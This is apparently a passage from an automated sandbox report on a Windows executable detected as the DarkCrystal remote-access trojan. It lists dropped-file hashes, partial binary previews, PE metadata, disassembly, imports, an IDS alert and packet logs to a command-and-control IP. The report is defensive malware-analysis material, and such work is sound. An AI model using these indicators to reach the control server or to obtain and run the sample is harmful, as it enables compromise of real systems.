                                                                                                Preview:6vOpOtUdnJbODOiQosrxi7vvDPYaOAp79RMgHTQkPCyUT12icXNmDgD9Adl9V4OmedOvBCJUcHigIabLX071wD4dONforROUxLz0nHgZO2J57h1jCale6X0bjuhygfnL2Ns6lliQTin438fqW6lRpuYaVYQ2ks3tP8Dtz48a1VLYu6hlP0ck3VgIzRkMVqqlo4o55v1b7LaTjAqZ1pmtQTz3b44hUvFKpjtzRmqd9Ams5MjzlKVqD6VVEvdA1TGLFPn9Q0IO8JtPqH7PVE5JaZGsOYvfIplq3ampijiuCGr4NGo6xOowX7vpJ5v2FmGThDVQfSqvgLHTsMeItys3BzS6o6gnyqpZ9XWKuXbfi3QM0b77amIR4MSsuZlivD6zfrTUzUXVWMVHiFGN9iMLiYfxFnaVw3te6brIHmHGPw4r0KKoSYjM0uRHLgPL4Bjdc1LHY7FWaG6vdx65dvCXUgoLKj7lX5LNMbP98DPVSMwtyfnXkTsI9LI5M96yAe8f4siCi66ZfrEHu4Xo6jADNDOBSTx8GaUyNQyF6kznXTmRGBKRmS2bd5S1ehtPJ7TEWQ4dFRsVtXq3a64RIfVyi3US87lY1jeZ9h40GrLVjgrGOYbhnbHn

                                                                                                C:\Windows\ShellExperiences\uAsLgsGzSk.exe

                                                                                                Download File
                                                                                                Process:C:\HyperWebbroker\serverBrokerperfMonitor.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):2639872
                                                                                                Entropy (8bit):7.708083768963088
                                                                                                Encrypted:false
                                                                                                SSDEEP:49152:BP7hQ8Pq9P0qBSw83+Gnfm+VS9QxqgYRvzd4WihPt:BPpicQSwYne++govniz
                                                                                                MD5:C1CF39EF49B82B35938CA7A45DBCCEEE
                                                                                                SHA1:5F299703C001F490C4D216C357BB468265714541
                                                                                                SHA-256:E50625F048DA6C56A34810822FBAE68C7159C966450CFE73FEC3A8D0CDA0AFCA
                                                                                                SHA-512:279B9E3BF02AF93934C25E604E2039F2CC336780EAA71B8E0AB7E58FEEE9809422D0FD107C82B2E1BA4E66E96F968B00F0B49395E79947262C88AE34650AF76B
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 68%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................@(.........^_(.. ...`(...@.. ........................(...........@.................................._(.K....`(.p.....................(...................................................... ............... ..H............text...d?(.. ...@(................. ..`.rsrc...p....`(......B(.............@....reloc........(......F(.............@..B................@_(.....H.......P...........e...d........^(......................................0..........(.... ........8........E........\...)...M...8....(.... ....~~...{....:....& ....8....(.... ....~~...{....:....& ....8....(.... ....8....*....0.......... ........8........E................F.......|...8........~....(L...~....(P... ....<~... ....~~...{h...9....& ....8....~....(D... .... .... ....s....~....(H....... ....8g...~....:*... ....~~...{....:I...& ....8>...r...ps....z*8.... ....~~...{....

                                                                                                \Device\Null

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\w32tm.exe
                                                                                                File Type:ASCII text
                                                                                                Category:dropped
                                                                                                Size (bytes):151
                                                                                                Entropy (8bit):4.777999706692488
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:VLV993J+miJWEoJ8FXXtQv7qTqvvpYWyLAHKvj:Vx993DEUstOSWyYs
                                                                                                MD5:59EDE95D0E4A5DFA4441E13CF348F605
                                                                                                SHA1:53B30ED72170CA3CD73E9FA6C43F81B2905985FC
                                                                                                SHA-256:96DFFDD95C78165486E4017882814FAA15565EA39E88FE3B13BFE2B530DE9089
                                                                                                SHA-512:004040F5014A8A2FA5959212C6E6D0AB67DDC76E250E64B3AB2F3D2F97EBCA134A2A25521829D4D2DA07D7D251C275FDCDFCF9E1D34971D9135476415527EBEE
                                                                                                Malicious:false
                                                                                                Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 10/01/2025 03:30:38..03:30:38, error: 0x80072746.03:30:43, error: 0x80072746.

                                                                                                Static File Info

                                                                                                General

                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Entropy (8bit):7.658372439681941
                                                                                                TrID:
                                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                File name:hz7DzW2Yop.exe
                                                                                                File size:2'926'873 bytes
                                                                                                MD5:46dcddd43cbaeae845c14e7306726ff2
                                                                                                SHA1:4952a7cd01795d736450074433337d2a544b1e50
                                                                                                SHA256:ab98b91a647e45e348db97bd277efcc122d10d45a5891bfac3d627f3a865b580
                                                                                                SHA512:f7e628e12188e72a89617c1ae677fa3374b831ad91ec159b3138452d633a9fa46f789f17e9336476e3e0e00b532c53bf207777fd4d2703d3677fb18bc15c78a7
                                                                                                SSDEEP:49152:HBmFP7hQ8Pq9P0qBSw83+Gnfm+VS9QxqgYRvzd4WihPtu:hmPpicQSwYne++govnizu
                                                                                                TLSH:03D5D006B1A28E33D2643F39A9D7012E93B0D7627E12DF5B361E5095AD462708B673F3
                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.

                                                                                                File Icon

                                                                                                Icon Hash:0124804c64000000

                                                                                                Static PE Info

                                                                                                General

                                                                                                Entrypoint:0x41f530
                                                                                                Entrypoint Section:.text
                                                                                                Digitally signed:false
                                                                                                Imagebase:0x400000
                                                                                                Subsystem:windows gui
                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                                                                                TLS Callbacks:
                                                                                                CLR (.Net) Version:
                                                                                                OS Version Major:5
                                                                                                OS Version Minor:1
                                                                                                File Version Major:5
                                                                                                File Version Minor:1
                                                                                                Subsystem Version Major:5
                                                                                                Subsystem Version Minor:1
                                                                                                Import Hash:12e12319f1029ec4f8fcbed7e82df162

                                                                                                Entrypoint Preview

                                                                                                Instruction
                                                                                                call 00007F8AF08269EBh
                                                                                                jmp 00007F8AF08262FDh
                                                                                                int3
                                                                                                int3
                                                                                                int3
                                                                                                int3
                                                                                                int3
                                                                                                int3
                                                                                                push ebp
                                                                                                mov ebp, esp
                                                                                                push esi
                                                                                                push dword ptr [ebp+08h]
                                                                                                mov esi, ecx
                                                                                                call 00007F8AF0819147h
                                                                                                mov dword ptr [esi], 004356D0h
                                                                                                mov eax, esi
                                                                                                pop esi
                                                                                                pop ebp
                                                                                                retn 0004h
                                                                                                and dword ptr [ecx+04h], 00000000h
                                                                                                mov eax, ecx
                                                                                                and dword ptr [ecx+08h], 00000000h
                                                                                                mov dword ptr [ecx+04h], 004356D8h
                                                                                                mov dword ptr [ecx], 004356D0h
                                                                                                ret
                                                                                                int3
                                                                                                int3
                                                                                                int3
                                                                                                int3
                                                                                                int3
                                                                                                int3
                                                                                                int3
                                                                                                int3
                                                                                                int3
                                                                                                int3
                                                                                                int3
                                                                                                int3
                                                                                                int3
                                                                                                push ebp
                                                                                                mov ebp, esp
                                                                                                push esi
                                                                                                mov esi, ecx
                                                                                                lea eax, dword ptr [esi+04h]
                                                                                                mov dword ptr [esi], 004356B8h
                                                                                                push eax
                                                                                                call 00007F8AF082978Fh
                                                                                                test byte ptr [ebp+08h], 00000001h
                                                                                                pop ecx
                                                                                                je 00007F8AF082648Ch
                                                                                                push 0000000Ch
                                                                                                push esi
                                                                                                call 00007F8AF0825A49h
                                                                                                pop ecx
                                                                                                pop ecx
                                                                                                mov eax, esi
                                                                                                pop esi
                                                                                                pop ebp
                                                                                                retn 0004h
                                                                                                push ebp
                                                                                                mov ebp, esp
                                                                                                sub esp, 0Ch
                                                                                                lea ecx, dword ptr [ebp-0Ch]
                                                                                                call 00007F8AF08190C2h
                                                                                                push 0043BEF0h
                                                                                                lea eax, dword ptr [ebp-0Ch]
                                                                                                push eax
                                                                                                call 00007F8AF0829249h
                                                                                                int3
                                                                                                push ebp
                                                                                                mov ebp, esp
                                                                                                sub esp, 0Ch
                                                                                                lea ecx, dword ptr [ebp-0Ch]
                                                                                                call 00007F8AF0826408h
                                                                                                push 0043C0F4h
                                                                                                lea eax, dword ptr [ebp-0Ch]
                                                                                                push eax
                                                                                                call 00007F8AF082922Ch
                                                                                                int3
                                                                                                jmp 00007F8AF082ACC7h
                                                                                                int3
                                                                                                int3
                                                                                                int3
                                                                                                int3
                                                                                                push 00422900h
                                                                                                push dword ptr fs:[00000000h]

                                                                                                Rich Headers

                                                                                                Programming Language:
                                                                                                • [ C ] VS2008 SP1 build 30729
                                                                                                • [IMP] VS2008 SP1 build 30729

                                                                                                Data Directories

                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x3d0700x34.rdata
                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x3d0a40x50.rdata
                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x640000x57a8.rsrc
                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x6a0000x233c.reloc
                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x3b11c0x54.rdata
                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x355f80x40.rdata
                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x330000x278.rdata
                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3c5ec0x120.rdata
                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                Sections

                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                .text0x10000x31bdc0x31c002831bb8b11e3209658a53131886cdf98False0.5909380888819096data6.712962136932442IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                .rdata0x330000xaec00xb000042f11346230ca5aa360727d9908e809False0.4579190340909091data5.261605615899847IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                .data0x3e0000x247200x10009670b581969e508258d8bc903025de5eFalse0.451416015625data4.387459135575936IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                .didat0x630000x1900x200c83554035c63bb446c6208d0c8fa0256False0.4453125data3.3327310103022305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                .rsrc0x640000x57a80x5800b02b3b6101a2b8c19d40c58e3310fcffFalse0.6669034090909091data6.694018179144421IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                .reloc0x6a0000x233c0x240040b5e17755fd6fdd34de06e5cdb7f711False0.7749565972222222data6.623012966548067IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                Resources

                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                PNG0x645240xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                                                                                                PNG0x6506c0x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                                                                                                RT_ICON0x666180xe43PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9068748288140236
                                                                                                RT_DIALOG0x6745c0x286dataEnglishUnited States0.5092879256965944
                                                                                                RT_DIALOG0x676e40x13adataEnglishUnited States0.60828025477707
                                                                                                RT_DIALOG0x678200xecdataEnglishUnited States0.6991525423728814
                                                                                                RT_DIALOG0x6790c0x12edataEnglishUnited States0.5927152317880795
                                                                                                RT_DIALOG0x67a3c0x338dataEnglishUnited States0.45145631067961167
                                                                                                RT_DIALOG0x67d740x252dataEnglishUnited States0.5757575757575758
                                                                                                RT_STRING0x67fc80x1e2dataEnglishUnited States0.3900414937759336
                                                                                                RT_STRING0x681ac0x1ccdataEnglishUnited States0.4282608695652174
                                                                                                RT_STRING0x683780x1b8dataEnglishUnited States0.45681818181818185
                                                                                                RT_STRING0x685300x146dataEnglishUnited States0.5153374233128835
                                                                                                RT_STRING0x686780x46cdataEnglishUnited States0.3454063604240283
                                                                                                RT_STRING0x68ae40x166dataEnglishUnited States0.49162011173184356
                                                                                                RT_STRING0x68c4c0x152dataEnglishUnited States0.5059171597633136
                                                                                                RT_STRING0x68da00x10adataEnglishUnited States0.49624060150375937
                                                                                                RT_STRING0x68eac0xbcdataEnglishUnited States0.6329787234042553
                                                                                                RT_STRING0x68f680xd6dataEnglishUnited States0.5747663551401869
                                                                                                RT_GROUP_ICON0x690400x14data1.05
                                                                                                RT_MANIFEST0x690540x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333

                                                                                                Imports

                                                                                                DLLImport
                                                                                                KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
                                                                                                OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
                                                                                                gdiplus.dllGdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

                                                                                                Possible Origin

                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                EnglishUnited States

                                                                                                Network Behavior

                                                                                                Suricata IDS Alerts

                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                2025-01-10T07:57:31.379268+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.44973689.23.100.24280TCP

                                                                                                Network Port Distribution

                                                                                                TCP Packets

                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Jan 10, 2025 07:57:30.524283886 CET4973680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:30.529469013 CET804973689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:30.529670954 CET4973680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:30.531393051 CET4973680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:30.536446095 CET804973689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:30.877572060 CET4973680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:30.882489920 CET804973689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:31.274888992 CET804973689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:31.379204035 CET804973689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:31.379251003 CET804973689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:31.379267931 CET4973680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:31.429939985 CET4973680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:31.434773922 CET804973689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:31.514209032 CET4973780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:31.519072056 CET804973789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:31.519167900 CET4973780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:31.519287109 CET4973780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:31.524125099 CET804973789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:31.670556068 CET804973689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:31.670717001 CET4973680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:31.675589085 CET804973689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:31.876787901 CET4973780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:31.881737947 CET804973789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:31.881766081 CET804973789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:31.881773949 CET804973789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:31.931037903 CET804973689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:31.952721119 CET4973680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:31.957629919 CET804973689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:32.194262981 CET804973689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:32.194561958 CET4973680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:32.199501991 CET804973689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:32.199573994 CET804973689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:32.255752087 CET804973789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:32.360888958 CET4973780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:32.408117056 CET804973789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:32.441204071 CET804973689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:32.470607996 CET4973780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:32.517034054 CET4973680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:32.601072073 CET4973680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:32.601514101 CET4973880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:32.606215000 CET804973689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:32.606281996 CET4973680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:32.606338978 CET804973889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:32.606401920 CET4973880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:32.606549025 CET4973880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:32.609419107 CET4973780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:32.611416101 CET804973889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:32.614398003 CET804973789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:32.614497900 CET4973780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:32.956928015 CET4973880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:32.962167025 CET804973889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:32.962188005 CET804973889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:32.962199926 CET804973889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:33.361191988 CET804973889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:33.489578009 CET4973980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:33.495035887 CET804973989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:33.495337009 CET4973980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:33.496103048 CET4973980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:33.496560097 CET804973889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:33.496718884 CET4973880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:33.500993967 CET804973989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:33.681040049 CET4974080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:33.686196089 CET804974089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:33.686275959 CET4974080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:33.686378002 CET4974080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:33.691236973 CET804974089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:33.845182896 CET4973980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:33.850301981 CET804973989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:33.850474119 CET804973989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:34.032778978 CET4974080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:34.038023949 CET804974089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:34.038042068 CET804974089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:34.038057089 CET804974089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:34.259073019 CET804973989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:34.314184904 CET4973980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:34.394682884 CET804973989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:34.436712027 CET4973980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:34.450289965 CET804974089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:34.586520910 CET804974089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:34.586594105 CET4974080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:34.835117102 CET4973980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:34.835201979 CET4974080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:34.835544109 CET4974380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:34.840451956 CET804973989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:34.840470076 CET804974089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:34.840483904 CET804974389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:34.840497017 CET4973980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:34.840539932 CET4974080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:34.840565920 CET4974380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:34.840650082 CET4974380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:34.845508099 CET804974389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:35.189908981 CET4974380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:35.195075035 CET804974389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:35.195116043 CET804974389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:35.195147991 CET804974389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:35.573590040 CET804974389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:35.606478930 CET4973880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:35.689012051 CET4974380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:35.725929022 CET804974389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:35.860882044 CET4974380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:35.938079119 CET4974480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:35.939111948 CET4974380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:35.943185091 CET804974489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:35.943334103 CET4974480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:35.943367958 CET4974480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:35.944317102 CET804974389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:35.944376945 CET4974380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:35.948178053 CET804974489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:36.298312902 CET4974480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:36.303397894 CET804974489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:36.303416967 CET804974489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:36.303431034 CET804974489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:36.700068951 CET804974489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:36.833344936 CET804974489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:36.833797932 CET4974480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:39.408490896 CET4974480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:39.408701897 CET4974680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:39.413547993 CET804974689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:39.413657904 CET4974680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:39.413717985 CET804974489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:39.413741112 CET4974680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:39.413777113 CET4974480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:39.418613911 CET804974689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:39.767108917 CET4974680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:39.772176027 CET804974689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:39.772222042 CET804974689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:40.175774097 CET804974689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:40.309935093 CET4974680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:40.310460091 CET804974689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:40.425162077 CET4974680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:40.748334885 CET4974680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:40.748768091 CET4974780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:40.753549099 CET804974689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:40.753618002 CET4974680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:40.753726006 CET804974789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:57:40.753796101 CET4974780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:57:40.753892899 CET4974780192.168.2.489.23.100.242
